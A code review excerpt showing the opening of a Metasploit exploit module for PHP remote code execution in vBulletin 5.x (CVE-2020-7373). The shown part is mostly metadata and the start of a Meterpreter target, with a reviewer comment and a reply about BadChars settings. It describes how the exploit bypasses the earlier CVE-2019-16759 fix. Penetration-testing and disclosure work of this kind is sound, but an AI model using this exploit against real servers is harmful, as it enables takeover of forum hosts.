modules/exploits/multi/http/vbulletin_widget_template_rce.rb

```diff
@@ -0,0 +1,141 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
+      'Description' => %q{
+        This module exploits a logic bug within the template rendering code in vBulletin 5.x.
+        The module uses the vBulletin template rendering functionality to render the
+        'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
+        This causes the former template to load the latter bypassing filters originally put in place
+        to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input
+        allowing the module to achieve PHP remote code execution on the target. This module has been
+        tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
+      },
+      'Author' => [
+        'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
+      ],
+      'References' => [
+        ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],
+        ['CVE', '2020-7373']
+      ],
+      'DisclosureDate' => '2020-08-09',
+      'License' => MSF_LICENSE,
+      'Platform' => ['php', 'unix', 'windows'],
+      'Arch' => [ARCH_CMD, ARCH_PHP],
+      'Privileged' => true,
+      'Targets' => [
+        ['Meterpreter (PHP In-Memory)',
+          'Platform' => 'php',
+          'Arch' => [ARCH_PHP],
+          'Type' => :php_memory,
+          'Payload' => {
+            'BadChars' => "\x22",
```

Comment:
Shouldn't the other two payloads have this `BadChars` value as well?

Reply:
BadChars was not needed, removed from all payloads.